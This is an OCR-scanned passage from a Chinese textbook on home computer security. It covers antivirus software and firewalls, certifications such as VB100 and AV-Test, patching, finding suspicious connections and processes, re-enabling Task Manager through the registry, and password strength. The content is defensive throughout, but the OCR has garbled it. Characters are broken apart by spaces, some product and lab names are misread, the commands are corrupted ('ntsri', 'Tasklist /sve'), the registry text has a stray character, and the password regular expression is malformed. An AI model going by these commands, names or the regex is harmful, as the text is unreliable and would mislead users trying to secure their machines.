和 各 种 软件 缺陷 频 发 的 情况 下 , 防 病毒 软件 和 防火 墙 让 个 人 电脑 有 能 力 抵御 计算 机 病毒 
与 网 络 攻击 。 


1. 防 病毒 软件 和 个 人 防火 墙 的 概念 


防 病毒 软件 ,也 称 反 病 毒 软件 或 杀毒 软件 ,是 用 于 消除 电脑 病毒 ,特洛伊 木马 和 恶意 
软件 等 计算 机 威胁 的 一 类 软件 。 一 般 我 们 市 面 上 常见 的 防 病毒 软件 通常 集成 系统 实时 
监控 ,病毒 识别 与 扫描 ,病毒 清除 与 隔离 、 自 动 升级 程序 或 病毒 库 \、 云 查 杀 数据 恢复 等 功 
能 ,是 计算 机 防御 系统 的 重要 组 成 部 分 。 杀 毒 软件 是 一 种 可 以 对 病毒 .木马 等 一 切 已 知 
的 对 计算 机 有 危害 的 程序 代码 进行 清除 的 程序 工具 。“ 杀 毒 软件 "由 国内 的 老 一 辈 反 病 
毒 软件 厂商 起 的 名 字 , 后 来 由 于 和 世界 反 病毒 业 接轨 统称 为 “ 反 病毒 软件 ”“ 安 全 防护 软 
件 ” 或 “安全 软件 ”。 市面 上 还 出 现 了 许多 集成 防火 墙 的 “互联 网 安全 套装 ”“ 全 功能 安全 
套装 ”等 用 于 消除 电脑 病毒 、 特 洛 伊 木马 和 恶意 软件 的 一 类 软件 ,其 实 也 都 是 属于 杀毒 软 
件 的 范畴 。 

在 计算 机 计算 领域 中 ,防火 墙 (firewall) 是 一 种 协助 确保 信息 安全 的 设备 ,会 依照 特 
定 的 规则 ,允许 或 是 限制 传输 数据 的 通过 。 防 火 墙 是 一 台 专 属 的 硬件 或 是 架设 在 一 般 硬 
件 上 的 一 套 软件 。 但 针对 个 人 网 络 安全 ,我们 一 般 提 到 的 防火 墙 指 的 是 个 人 防火 墙 。 个 
人 防火 墙 是 防止 您 电脑 中 的 信息 被 外 部 侵袭 的 一 项 技术 , 它 能 在 您 的 系统 中 监控 、 阻 止 
任何 未 经 授权 允许 的 数据 进入 或 发 出 到 互联 网 及 其 他 网 络 系统 。 这 种 防火 墙 不 需要 特 


定 的 网 络 设备 ,只 要 在 用 户 所 使 用 的 主机 上 安装 软件 即 可 。 由 于 网 络 管理 者 可 以 远 距 离 
地 进行 设置 和 管理 ,终端 用 户 在 使 用 时 不 必 特 别 在 意 防火 墙 的 存在 ,极为 适合 小 企业 和 
个 人 等 的 使 用 。 


2. 个 人 该 如 何 选取 安全 防护 软件 


由 于 计算 机 安全 形势 的 日 益 严 峻 ,各 种 安全 软件 琳琅 满目 。 许 多 用 户 希 望 挑选 一 款 
适合 自己 的 安全 软件 。 那 是 否 有 什么 标准 可 以 进行 参考 ? 答案 是 有 的 。 国 际 上 有 许多 
权威 认证 可 供 参考 ,许多 安全 软件 厂商 都 会 将 产品 送 去 进行 检测 或 认证 。 以 下 是 几 个 可 
供 参 考 的 权威 认证 。 

1) VB100 权威 认证 

VB100 是 由 英国 非 官 方 反 病 毒 机 构 Virus Bulletin 开设 的 一 项 评测 认证 ,这 项 认证 
则 在 对 市 场 中 的 反 病 毒 软件 产品 进行 独立 公正 的 比较 与 检测 。Virus Bulletin 希望 通过 
自己 的 独立 检测 ,能够 帮助 消费 者 和 厂商 直观 的 鉴别 出 反 病 毒 产 品 的 病毒 防护 率 和 扫描 
速度 。VB100 评测 规则 十 分 苛刻 ,只 有 诊断 率 100%、 误 诊 0% 时 才 会 被 通过 ;无 论 你 是 
遗漏 一 个 病毒 还 是 一 百 个 ,对 于 它 没 有 任何 区 别 , 均 会 被 打上 未 通过 的 烙印 。VB1001 标 
志 如 图 2. 10 所 示 。 

2) AV-Comparatives 权威 认证 

AV-Comparatives 是 一 个 被 奥地利 政府 承认 的 非 营 利 性 的 组 织 , 也 是 一 个 国际 性 的 
独立 测试 机 构 , 因 提供 针对 计算 机 安全 产品 的 综合 性 与 客观 性 评测 结果 而 闻名 。 无 论 是 
在 对 计算 机 病毒 查 杀 能 力 的 测试 上 ,还 是 对 其 他 各 类 有 害 程序 的 检测 上 ,AVC 始终 被 杀 
毒 软件 行业 公认 为 信得过 的 独立 测试 机 构 。AV-Comparatives 标志 如 图 2. 11 所 示 。 

3) 英国 西海 岸 实 验 室 (West Coast Labs)Check Mark 认证 

英国 西海 岸 实 验 室 (West Coast Lads) 举 行 Check Mark 认证 ,是 世界 三 大 安全 软件 
权威 评测 机 构 , 在 安全 类 产品 认证 中 , Check Mark 认证 与 VB100 认证 、AV- 
Comparatives 认证 并 称 为 全 球 三 大 反 恶 意 软 件 权 威 认 证 。Check Mark 认证 标志 如 
图 2.12 所 示 。 


?0 EW E 


VIRUS 本 
[vsbmoomj comparatives 
2.10 VB100 2.11 AV-Comparatives 图 2.12 Check Mark 认证 


4) AV-Test 权威 认证 
AV-Test 独立 测试 机 构 诞 生 于 德国 ,在 反 病毒 评测 领域 有 超过 15 年 的 历史 ,一 直 以 
海量 病毒 库 检 测 .独立 客观 的 检测 过 程 和 严格 的 标准 著称 ,是 国际 安全 业界 最 著名 的 认 
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证 之 一 。AV-Test 被 业界 公认 为 世界 级 杀 软 的 对 决 平台 ,提供 反 病毒 产品 测试 ,技术 含 
量 测试 以 及 跟踪 监测 计算 机 安全 产品 的 长 期 检测 率 。AV-Test 标志 如 图 2. 13 所 示 。 

5) AVAR 亚洲 病毒 研究 者 协会 会 员 

亚洲 反 病毒 研究 者 (AVAR) 成 立 的 目的 是 为 了 防止 计算 机 病毒 在 本 地 区 的 传染 与 
破坏 ,并 与 这 些 危 害 用 户 安全 的 风险 作 斗 争 。AVAR 的 会 员 们 承诺 改进 其 产品 或 者 采用 
掌握 的 知识 与 技能 来 参与 本 地 区 和 国际 间 的 反 病毒 活动 。 亚 洲 反 病毒 研究 者 (AVAR) 
标志 如 图 2. 14 所 示 。 
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图 2.13 AV-Test 图 2.14 亚洲 反 病毒 研究 者 (AVAR) 


6) OPSWAT 国际 认证 

认证 隶属 于 美国 终端 安全 软件 兼容 性 认证 机 构 OPSWAT, 专 门 提供 开放 式 的 工业 
级 兼容 性 和 可 靠 性 认证 ,测试 过 程 包括 安装 测试 .流氓 程序 检测 .数字 签名 验证 、 病 毒 扫 
描 和 检测 。 凡 参加 认证 的 杀毒 软件 ,测试 机 构 不 仅 会 检测 其 兼容 性 和 杀毒 能 力 , 还 会 检 
测 杀 毒 软 件 自身 是 否 包 含 可 疑 恶意 组 件 , 只 有 稳定 可 靠 的 产品 才能 通过 认证 。 微软、 思 
科 、 囊 普 、 戴 尔 以 及 众多 知名 安全 软件 都 是 该 项 认证 机 构 的 成 员 。OPSWAT 国际 认证 标 
志 如 图 2. 15 所 示 。 

7) ICSA 国际 认证 

ICSA 是 威 瑞 森 旗 下 的 一 个 独立 分 支 ,提供 可 靠 的 .独立 的 第 三 方 测试 ,二 十 多 年 来 
一 直 致 力 保护 终端 用 户 和 企业 的 安全 ,为 上 百 种 的 产品 和 服务 提供 认证 。 凡 是 获得 
ICSA 实验 室 认 证 的 反 病 毒 产 品 在 减少 因 病 毒 而 引起 的 安全 隐患 方面 ,都 可 以 满足 一 系 
列 的 公众 检验 标准 和 业界 接受 的 规范 。 世 界 级 的 企业 都 十 分 信任 ICSA 的 客观 公正 的 测 
试 以 及 认证 标准 。ICSA 国际 认证 标志 如 图 2. 16 所 示 。 


cr ED ANTI-WIRUS 
Antispyware 


2.15 OPSWAT 国际 认证 2.16 ”1ICSA 国际 认证 


介绍 了 上 述 权 威 认证 ,用 户 该 如 何 查 看 检测 报告 ? 一 般 情况 是 访问 这 些 权 威 测试 的 
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官方 网 站 ,每 隔 一 段 时 间 这 些 权 威 认 证 都 会 对 送 测 的 产品 进行 评分 。 但 这 些 网 站 一 般 都 
是 英文 ,对 于 英文 不 擅长 的 用 户 可 以 通过 搜索 引擎 ,例如 ,百度 、Bing、 搜 狗 搜索 等 ,搜索 
最 新 的 检测 报告 翻译 。 

例如 ,2014 年 12 月 的 AV-TEST 针对 Windows 7 平台 下 安全 产品 的 检测 报告 如 


图 2.17 所 示 。 
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.17 2014 年 12 月 AV-TEST 针对 Windows 7 平台 下 安全 产品 的 检测 报告 


如 图 2.17 所 示 ,AV-TEST 将 安全 产品 分 为 保护 能 力 ,软件 表现 、 可 用 性 三 个 部 分 进 


行 评分 ,每 个 部 分 6 分 , 共 18 分 。 


TT 


中 保护 能 力 指 的 是 保护 用 户主 机 免 受 恶意 软件 感染 


的 能 力 ;软件 表现 指 的 是 在 用 户 日 常 使 用 中 计算 机 运行 速度 的 平均 影响 ;可 用 性 指 的 是 
安全 软件 对 整个 计算 机 可 用 性 的 影响 。 
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参考 图 2. 17 ,我 们 可 以 看 出 表现 较 好 的 安全 软件 有 : 比特 焚 德 网 络 安全 软件 2015 
(Bitdefender Internet Security 2015) ,得 到 了 17. 5 分 ;卡巴 斯 基 网 络 安全 软件 2015 
(Kaspersky Internet Security 2015) ,得 到 了 17. 5 分 ;趋势 科技 网 络 安全 软件 2015 
(Trend Micro Internet Security 5. 0) ,得 到 了 17. 5 分 ;360 网 络 安全 软件 5. 0(360 
Internet Security 5. 0) ,得 到 了 17 分 ;小 红 爹 杀毒 专业 版 2015 (Avira Antivirus Pro 
2015) ,得 到 了 17 分 等 。 

不 同 的 权威 认证 所 侧重 的 方面 也 不 尽 相 同 , 例 如 ,AV-Comparatives 所 做 的 “真实 世 
界 ” 动 态 保 护 测试 。“ 真 实 世 界 ” 动 态 保 护 测试 通过 模拟 普通 用 户 日 常 遇 到 的 状况 进行 测 
试 。 该 测试 2015 年 3 一 6 月 的 测试 结果 如 图 2. 18 所 示 。 
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2.18 2015 年 3 一 6 月 “真实 世界 "动态 保护 测试 


如 图 2.18 所 示 ,比较 优秀 的 安全 软件 厂商 有 熊猫 (Panda) .比特 楚 德 (Bitdefender) 、 
卡巴 斯 基 (Kaspersky Lab) ,趋势 科技 (Trend Micro) .小 红 锌 (Avira) .腾讯 CTencent) 等 。 
AV-Comparatives 对 于 测试 做 出 的 成 绩 还 会 进行 评定 ,这 次 测试 的 评定 如 图 2. 19 所 示 。 

当然 ,参考 权威 认证 只 是 一 个 方面 ,并 不 是 说 测试 取得 成 绩 一 般 的 厂商 就 没有 什么 
长 处 。 参 与 测评 的 软件 有 一 些 是 付费 安全 软件 的 免费 版 本 ,还 有 许多 优秀 的 安全 软件 并 
没有 参与 测评 。 国 内 的 安全 软件 厂商 ,例如 ,金山 、 瑞 星 、 微 点 、 江 民 、 火 绒 、 百 度 、 费 尔 等 ， 
国际 厂商 诸如 Dr. Web、IKARUS、Agnitum 等 都 很 少 在 测试 中 见 到 身影 。 

随 着 网 络 时代 的 到 来 ,不 光 有 个 人 电脑 的 防护 软件 ,还 有 针对 手机 用 户 推出 的 安全 
防护 软件 。 个 人 电脑 也 包含 有 Windows XP、Windows Vista、Windows 7、Windows 8、 
Windows 10、Mac OS、Linux 等 平台 ,针对 个 人 需求 可 查询 上 述 权威 认证 的 官方 网 站 。 
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2.19 2015 年 3 一 6 月 “真实 世界 "动态 保护 测试 评测 奖励 


234 完善 你 的 计算 机 系统 


1. 查 漏洞 


打 补 丁 


当 我 们 构建 好 第 一 道 防线 之 后 并 不 是 就 高 枕 无 忱 了 ,人 们 总 会 发 现 操作 系统 本 身 存 


在 着 许多 漏洞 ， 


因此 操作 系统 提供 商 就 会 放出 各 种 针对 不 同 漏洞 的 补丁 。 


系统 漏洞 是 指 应 用 软件 或 操作 系统 软件 在 逻辑 设计 上 的 缺陷 或 错误 ,被 不 法 者 利 


用 ,通过 网 络 植 


入 木马 ,病毒 等 方式 来 攻击 或 控制 整个 电脑 , 穷 取 电脑 中 的 重要 资料 和 信 


息 ,甚至 破坏 系统 。 在 不 同 种 类 的 软 、 硬 件 设备 , 同 种 设备 的 不 同 版 本 之 间 , 由 不 同 设备 
构成 的 不 同系 统 之 间 ,以 及 同 种 系统 在 不 同 的 设置 条 件 下 ,都 会 存在 各 自 不 同 的 安全 漏 


洞 问题 。 


补丁 指 对 于 大 型 软件 系统 在 使 用 过 程 中 暴露 的 问题 而 发 布 的 解决 问题 的 小 程序 。 
就 像 衣 服 烂 了 就 要 打 补 丁 一 样 ,人 编写 程序 不 可 能 十 全 十 美的 ,所 以 软件 也 免不了 会 出 
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现 漏洞 ,而 补丁 则 是 为 了 专门 修复 这 些 漏 洞 。 因 为 原来 发 布 的 软件 存在 缺陷 ,发 现 之 后 
另外 编制 一 个 小 程序 使 其 完善 ,这 种 小 程序 俗称 补丁 。 补 丁 一 般 情况 下 都 由 发 布 程 序 的 
公司 提供 ,但 也 有 许多 编程 爱好 者 发 布 自制 补丁 。 这 些 民 间 的 自制 补丁 有 时 候 确实 能 起 
到 作用 ,但 更 推荐 的 还 是 官方 补丁 。 

在 一 般 情况 下 ,我们 需要 开启 系统 的 自动 更 新 。 例 如 ,Windows 系统 ,开启 自动 更 新 
后 ,若是 推出 了 新 的 补丁 ,系统 会 在 后 台 静 默 下 载 并 自动 安装 ,重启 后 生效 。 再 例如 ， 
Linux 系统 ,可 以 使 用 yum update 或 apt-get 等 命令 ,依照 自己 的 情况 决定 。 

我 们 较为 常见 的 是 Windows 用 户 ,许多 用 户 并 不 需要 很 多 补丁 中 的 新 功能 ,只 想 要 
打上 与 安全 性 有 关 的 重要 补丁 。 这 种 情况 下 也 许 装 安全 辅助 软件 是 一 个 很 好 的 选择 。 

安全 辅助 软件 ,是 可 以 帮助 杀毒 软件 与 防火 墙 的 计算 机 安全 产品 ,主要 用 于 实时 监 
控 防范 和 查 杀 流行 木马 、 清 理 系统 中 的 恶 评 插件 ,管理 应 用 软件 、 系 统 实时 保护 、 修 复 系 
统 漏洞 并 具有 浏览 器 修复 .浏览 器 保护 、 恶 意 程序 检测 及 清除 功能 等 ,同时 还 提供 系统 全 
面 诊断 ,弹出 插件 免疫 ,阻挡 色情 网 站 以 及 其 他 不 良 网 站 ,以 及 端口 的 过 滤 ,清理 系统 垃 
圾 ,痕迹 和 注册 表 , 以 及 系统 还 原 , 系 统 优化 等 特定 辅助 功能 ,并 且 提 供 对 系统 的 全 面 诊 
断 报告 ,方便 用 户 及 时 定位 问题 所 在 ,为 每 一 位 提供 全 方位 系统 安全 保护 ,而 且 能 够 兼容 
绝 大 多 数 杀毒 软件 。 安 全 辅助 软件 和 杀毒 软件 同时 在 一 起 使 用 ,可 以 更 大 幅度 提高 计算 
机 的 安全 性 、 稳 定性 和 其 他 性 能 。 

常见 的 安全 辅助 软件 有 360 安全 卫士 .金山 卫士 .腾讯 电脑 管家 、 瑞 星 安全 助手 、 百 
度 卫 士 等 。 他 们 都 能 够 对 系统 进行 漏洞 检测 ,通常 分 为 高 危 漏 洞 .可 选 漏洞 .功能 性 补丁 
等 。 一 般 情况 下 ,我 们 需要 做 的 是 在 安全 辅助 软件 的 界面 找到 修复 漏洞 ,之 后 软件 会 自 
动 开始 扫描 漏洞 ,结束 后 跳出 扫描 报告 。 选 择 我 们 需要 修复 的 漏洞 后 会 进入 下 载 安装 补 
丁 的 界面 ,我 们 接 下 来 只 需要 等 待 ,修复 后 重启 计算 机 就 可 以 了 。 


2. 通过 检查 网 络 活动 来 查看 电脑 的 安全 性 


对 于 一 般 用 户 , 可 以 根据 防火 墙 提供 的 对 外 连接 信息 判断 是 否 存在 非法 连接 。 例 
如 ,我 们 不 小 心安 装 了 一 个 流氓 软件 ,不 停 地 联网 推送 一 些 垃圾 信息 。 我 们 可 以 打开 之 
前 安装 的 防火 墙 , 单 击 其 中 的 系统 状态 进行 网 络 活动 的 查看 。 也 可 以 通过 查看 启动 项 ， 
查看 有 哪些 非法 程序 随 着 计算 机 的 启动 而 启动 执行 ,对 非法 程序 进行 筛选 。 还 可 以 通过 
查看 访问 规则 中 ,是否 有 非法 访问 规则 。 

对 于 有 一 定 计 算 机 基础 的 用 户 , 可 以 通过 netstat 命令 进行 查看 是 否 有 可 疑 连接 。 
如 果 发 现 有 可 疑 连接 , 则 很 有 可 能 已 经 中 了 木马 类 病毒 。 这 种 方法 要 求 相对 较 高 ,要 求 
用 户 了 解 哪些 连接 是 正常 的 ,哪些 连接 是 非法 的 。 具体 方法 是 选择 “开始 ”>“ 所 有 程序 ” 
一 “附件 ”命令 ,在 提示 符 窗口 中 输入 netstat -an 后 回 车 ,对 连接 IP 地 址 进行 查看 。 若 是 
有 可 疑 IP 地 址 ,可 以 到 网 上 进行 查询 后 再 进一步 确定 系统 的 安全 性 。 


3. 通过 任务 管理 器 查看 病毒 进程 


在 Windows 系统 启动 后 ,可 以 按 组 合 键 Ctrl 十 Alt 十 Del 调 出 任务 管理 器 。 也 可 以 
在 桌面 任务 栏 空 白 处 右 击 ,通过 快捷 菜单 选择 启动 任务 管理 器 , 单 击 后 弹出 任务 管理 器 
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窗口 。 之 后 选择 "进程 选项 卡 。 若 是 在 进程 中 发 现 来 历 不 明 的 进程 , 则 很 有 可 能 是 病毒 
或 者 木马 。 将 可 疑 进程 名 或 相关 信息 在 网 上 检索 后 ,再 进一步 确定 安全 性 。 当 确定 是 病 
毒 时 ,可 以 在 任务 管理 器 中 依次 单 击 “ 查 看 ”选择 列 ? 按 钮 ,在 弹出 的 窗口 中 选中 PID 
(进程 标识 符 ) 选 项 ,之 后 在 命令 提示 符 窗口 中 使 用 ntsri 命令 进行 进程 关闭 。 如 果 关 闭 
失败 , 则 有 可 能 是 重要 的 系统 进程 (系统 一 般 会 有 提示 ) ,或 是 恶性 病毒 进程 。 当 然 ,病毒 
进程 有 时 候 也 不 是 那么 容易 就 被 查 到 的 。 病 毒 进程 一 般 会 隐藏 自己 。 例 如 ,采用 与 系统 
进程 或 合法 程序 进程 的 命名 方式 。 正 常 的 进程 有 svchost. exe、explorer. exe、winlogon. 
exe 等 。 但 有 些 进 程 是 svch0st. exe .explore. exe、winlogin. exe 等 。 病 毒 进 程 利 用 相似 
命名 来 迷惑 用 户 的 眼睛 。 但 正常 命名 的 进程 是 否 就 是 安全 的 呢 ? 也 并 不 绝对 。 例 如 , 病 
毒 将 自己 复制 到 C:\Windows 中 ,并 命名 为 svchost. exe, 看 起 来 和 正常 进程 一 样 ,但 真正 
的 svchost. exe 进程 对 应 的 可 执行 文件 是 位 于 C:\Windows\System32 目录 下 的 。 对 于 
这 种 状况 ,可 以 进入 命令 提示 符 窗口 ,输入 Tasklist /sve 并 按 回 车 键 确定 ,查看 svchost. 
exe 进程 服务 是 否 为 暂 缺 ,若是 暂 缺 那 就 很 可 能 是 病毒 了 。 我 们 可 以 记 下 服务 之 前 显示 
的 PID, 在 进程 选择 该 病毒 对 应 的 PID, 右 击 结束 进程 即 可 。 现 在 也 有 许多 病毒 ,通过 任 
务 管 理 器 很 难 发 现 踪迹 ,甚至 有 些 病 毒 直接 禁用 受害 者 的 任务 管理 器 。 对 于 任务 管理 器 
被 禁用 的 情况 下 ,可 以 通过 修改 注册 表 修 复 。 打 开 注 册 表 ,展开 到 HKEY_CURRENT _ 
USER\ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System 找到 
DisableTaskmgr, 把 dword 值 设 置 为 00000000。 也 可 以 打开 记事 本 ,把 REGEDIT4 
[HKEY_CURRENT_USER\Software\ Microsoft\ Windows\CurrentVersion\ Policies\ 
System] "DisableTaskmgr" 王 dword:00000000 写 入 ,保存 为 . reg 文件 ,之 后 双击 导入 恢 
复 。 或 是 选择 “开始 ">“ 所 有 程序 ”>“ 附 件 ” 一 “运行 "命令 ,输入 gpedit. msc, 在 弹出 的 
本 地 组 策略 编辑 器 中 ,选择 “用 户 配 置 " 一 “管理 模板 ”一 “系统 ”选项 ,在 右边 的 设置 中 找 
到 “删除 任务 管理 器 ” ,双击 打 开 , 设 置 为 未 配置 或 者 禁用 。 即 可 解决 。 在 一 般 情况 下 ,我 
们 找到 病毒 进程 后 ,尝试 关闭 它 , 之 后 安装 专 杀 工 具 或 杀毒 软件 进行 查 杀 。 常 见 的 部 分 
系统 进程 如 表 2. 3 所 示 。 合 法 进程 还 有 很 多 , 表 2. 3 仅 是 一 个 粗略 的 概括 。 
表 2.3 常见 的 部 分 系统 进程 


smss. exe 


Csrss. exe 


winlogon. exe 


services. exe 


lsass. exe 


Svchost. exe 


explorer. exe 


spoolsv. exe 


internat. exe 


mstask. exe 


TegSVC. exe 


winmgmt. exe 


inetinfo. exe 


tlntsvr. exe 


tftpd. exe 


dns. exe 


alg. exe 


snmp. exe 


tcpsvcs. exe 


wininit. exe 


taskmon. exe 


lsass. exe 


lsm. exe 


conhost. exe 


LogonUI. exe 


igfxsrvc. exe 


4. 删除 不 必要 的 控件 或 软件 
在 浏览 网 页 时 ,我 们 经 常会 看 到 IE 浏览 器 或 是 安全 防护 软件 拦截 一 些 控件 或 软件 


stacsv64. exe 


wlanext. exe 
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的 安装 。 其 中 的 一 些 控件 是 不 安全 的 ,如 果 不 是 非常 的 需要 ,尽量 不 要 随便 安装 。 但 有 
些 * 流 氓 软件 ”会 在 用 户 的 计算 机 中 强制 安装 ,或 是 采用 欺骗 的 手段 ,例如 ,在 安装 软件 时 
采用 默认 安装 而 不 像 在 自 定义 安装 中 可 以 勾 选 是 否 安装 别 的 控件 或 软件 ,或 是 采用 弹 窗 
的 方式 诱导 用 户 下 载 安装 ,并且 不 易 外 载 。 当 安装 的 控件 过 多 时 ,这 些 控件 会 降低 系统 
的 稳定 性 和 速度 , 某 些 控件 还 会 收集 用 户 信息 ,对 用 户 隐私 有 泄露 的 威胁 。 一 般 情 况 下 ， 
我 们 可 以 进入 控制 面板 ,找到 “添加 ”或 “删除 ”程序 , 秃 载 其 中 不 必要 的 控件 或 软件 。 


5. 警惕 计算 机 的 异常 现象 


尽管 现在 许多 病毒 已 经 不 会 造成 计算 机 功能 性 异常 ,但 若是 发 生 异 常 , 大 部 分 原因 
都 是 因为 感染 了 病毒 或 木马 。 因 此 计算 机 若是 出 现 异常 现象 ,我 们 应 对 异常 情况 分 析 原 
因 ,做 好 计算 机 的 安全 防护 工作 。 计 算 机 常见 的 异常 有 如 下 几 点 。 

(1) 计算 机 反复 重启 或 未 知 原因 的 频繁 死机 。 

(2) 防火 墙 经 常 提示 有 不 明 连 接 的 请 求 。 

(3) 磁盘 的 主 引导 区 .引导 扇 区 ,文件 分 配 表 或 根 目录 被 修改 。 

(4) 计算 机 运行 速度 缓慢 ,在 没有 运行 非常 多 应 用 程序 的 情况 下 CPU 、 磁 盘 、 网 络 或 
内 存 占用 率 极 高 。 

(5) 屏幕 上 显示 不 正常 的 信息 。 

(6) 出 现 了 莫名 其 妙 的 隐藏 文件 或 其 他 文件 。 

(7) 可 执行 文件 的 文件 长 度 .建立 日 期 或 属性 无 故 发 生变 化 。 

(8) 系统 设备 无 故 不 能 使 用 ,例如 ,系统 不 能 识别 C 盘 ,键盘 或 鼠标 莫名 其 妙 的 突然 

(9) 聊天 时 反复 下 线 ,报告 账户 曾 在 异地 登录 或 突然 要 求 输入 账户 与 密码 等 。 

(10) 浏览 网 站 时 ,计算 机 自动 切换 到 其 他 无 关 的 网 站 。 

当 出 现 这 些 情况 时 应 当 怀 疑 计算 机 可 能 感染 了 病毒 。 确 认 感 染病 毒 后 ,我 们 应 先 将 
计算 机 关闭 。 接 着 对 计算 机 进行 隔离 ,使 它 处 于 非 联网 状态 。 然 后 用 干净 的 、 带 有 写 保 
护 的 操作 系统 盘 启 动 , 备 份 重要 的 数据 信息 后 ,使 用 杀毒 软件 或 病毒 木马 专 杀 工具 清除 
病毒 。 之 后 再 用 操作 系统 盘 引导 。 若 是 使 用 杀毒 软件 或 专 杀 工 具 等 方式 都 无 法 清除 病 
毒 ,可 把 硬盘 进行 格式 化 后 重新 安装 操作 系统 及 其 他 软件 。 


235 保护 你 的 个 人 信息 


根据 4 中国 网 民权 益 保 护 调查 报告 (2015)》 中 做 出 的 统计 ,广大 网 民 对 于 个 人 信息 保 
护 意识 是 有 的 ,但 具体 要 如 何 保护 ,能 够 采取 哪些 保护 个 人 信息 的 措施 ,是 许多 人 所 欠 
缺 的 。 

正如 之 前 提 到 的 ,密码 问题 .信息 泄露 .诈骗 等 问题 都 十 分 严重 。 在 《中 国 网 民权 益 
保护 调查 报告 (2015)》 中 做 出 了 明确 的 统计 , 近 一 年 因为 垃圾 信息 、 个 人 信息 泄露 .网 络 
诈骗 等 遭受 的 损失 如 图 2. 20 所 示 。 网 民 认为 最 重要 的 个 人 信息 如 图 2. 21 所 示 。 
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2.20 近 一 年 因为 垃圾 信息 .个 人 信息 泄露 ,网络 诈骗 等 遭受 的 损失 


网 民 认 为 最 重要 的 个 人 信息 


网 络 账号 和 密码 85.8% 
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电子 邮件 

软件 使 用 痕迹 13.6% 
婚姻 状态 10.8% 


学 历 7.4% 
其 他 图 3.7% 
0% 20% 40% 60% 80% 100% 
2.21 网 民 认为 最 重要 的 个 人 信息 
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1. 保护 好 账户 和 密码 


正如 上 面 所 说 的 ,许多 用 户 的 密码 存在 很 大 的 问题 ,很 容易 被 黑客 进行 破解 。 密 码 
是 否 有 个 标准 来 衡量 它 易 破解 的 程度 ? 有 的 ,我 们 称 之 为 密码 强度 。 密 码 强度 指 一 个 密 
码 被 非 认证 的 用 户 或 计算 机 破译 的 难度 。 密 码 强度 通常 用 * 弱 ”或 “ 强 ? 来 形容 。 但 是 密 
码 的 “ 弱 ”" 和 “ 强 ” 是 相对 的 ,不 同 的 密码 系统 对 于 密码 强度 有 不 同 的 要 求 。 我 们 在 设置 密 
码 时 ,存在 着 许多 禁忌 ,这 些 禁 忌 都 会 降低 密码 的 强度 ,具体 有 如 下 几 点 。 

(1) 密码 中 使 用 账户 的 某 些 字符 充当 密码 的 组 成 部 分 。 例 如 ,账号 为 mm87361000 
@xxx. com, 密 码 设置 为 873610、m87361 等 情况 。 在 许多 较为 规范 的 网 站 都 会 对 密码 与 
账户 字符 进行 检验 ,但 我 们 还 需 注意 对 一 些 没 有 进行 字符 检验 的 网 站 不 使 用 包含 账户 信 
息 的 密码 。 

(2) 密码 为 数字 组 合 。 最 典型 的 是 用 生日 作为 账户 密码 。 生 日 由 于 是 采用 年 月、 日 
的 纯 数字 组 成 的 ,是 弱 密码 ,很 容易 被 暴力 破解 。 例 如 ,19990101、19870422 等 ,都 是 安全 
性 较 低 的 密码 。 且 生日 这 种 个 人 信息 易 被 社会 工程 学 攻击 所 获取 ,网 上 个 人 信息 泛滥 也 
导致 不 法 分 子 很 容易 获得 用 户 的 生日 。 还 有 是 采用 个 人 电话 号 码 作为 账户 密码 。 同 生 
日 一 样 ,个 人 电话 号 码 也 是 易于 获取 的 信息 。 例 如 ,网 上 泄露 的 数据 库 、 被 贩卖 的 快递 单 
号 等 ,都 可 能 很 轻易 地 就 获取 电话 号 码 。 还 有 一 大 部 分 的 用 户 会 将 账户 密码 设置 为 简单 
好 记 的 数字 组 合 ,例如 888888、989898、123454321、666666 等 。 

(3) 密码 为 英文 字母 。 很 多 人 都 喜欢 用 英文 字母 作为 账户 密码 ,例如 ,采用 名 字 的 拼 
音 .单词 等 ,这 也 都 会 出 现在 黑客 的 密码 字典 当中 , 且 破 解 尝 试 次 数 较 低 , 也 是 安全 性 较 
低 的 弱 密 码 。 

(4) 密码 强度 够 高 但 不 适用 。 有 些 情况 下 我 们 设置 的 密码 也 许 强度 够 高 ,但 还 是 存 
在 着 危险 。 例 如 ,使 用 E-mail 账号 作为 密码 ,E-mail 账号 虽然 包含 着 特殊 字符 ,有 些 系统 
会 判断 为 强 密码 ,但 E-mail 被 认为 作为 公开 的 信息 是 不 适用 作为 密码 的 。 还 有 的 情况 下 
是 多 个 账号 使 用 同一 个 强 密码 ,只 要 一 个 账号 的 密码 遭 到 破解 ,其 他 账号 也 会 面临 被 破 
解 的 风险 。 多 个 账号 设置 同一 密码 的 情况 十 分 严重 ,就 算 密 码 是 强 密码 也 同样 面临 风 
险 ,更 不 用 说 许多 用 户 将 一 个 弱 密 码 设置 为 多 个 账号 的 密码 了 。 


2. 密码 复杂 性 策略 


通过 上 面 的 禁忌 我 们 知道 了 密码 有 强 弱 之 分 , 那 我 们 如 何 来 设置 一 个 强 密码 ,是 否 
有 什么 规则 可 以 参考 ? 答案 是 有 的 , 强 密码 的 复杂 性 符合 一 定 的 规则 。 虽 然 没 有 绝对 安 
全 的 密码 ,但 提高 密码 的 复杂 性 可 以 大 大 提高 系统 、 账 号 的 安全 性 。 

(1) 密码 要 有 大 小 写 之 分 。 对 于 大 小 写 敏 感 的 系统 或 应 用 ,我 们 有 必要 将 密码 设置 
为 大 小 写 混合 的 方式 。 大 小 写 混合 有 助 于 提高 密码 的 复杂 性 。 例 如 ,密码 “AbcDe” 相 比 
于 密码 “abcde” 复 杂 度 高 。 

(2) 密码 要 包含 特殊 字符 。 在 系统 允许 的 情况 下 ,密码 应 尽量 包含 特殊 字符 。 常 见 
的 特殊 字符 有 !、@、# 、%、&&、x 、(、)、[、j]、;、,、. 、/ 等 。 包含 特殊 字符 可 以 大 大 提高 黑 
客 暴 力 破解 的 难度 。 例 如 ,密码 A! b@c#D$e% 的 复杂 性 要 高 于 密码 AbcDe, 但 是 也 
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并 不 是 那么 难 记 , 细 心 的 读者 会 发 现 这 些 特殊 字符 符合 一 定 的 键盘 布局 与 思维 逻辑 。 在 
一 些 账号 及 其 重要 的 情况 下 ,若是 系统 允许 的 话 也 可 以 尝试 加 入 软 键盘 中 的 特殊 字符 。 
我 们 常见 的 密码 正则 表达 式 如 ^a-zA-Z]{1} ([a-zA-Z0-9]|[._!@#]){4,19) $ ,这 个 表 
达 式 的 意思 是 只 能 输入 长 度 为 5 一 20 个 字符 的 、 以 字母 开头 的 .大 小 写 混合 的 、 可 带 数 字 
及 . 、、!、@、# 这 些 特殊 字符 的 密码 。 这 种 情况 下 我 们 就 无 法 使 用 除 上 述说 的 特殊 字符 
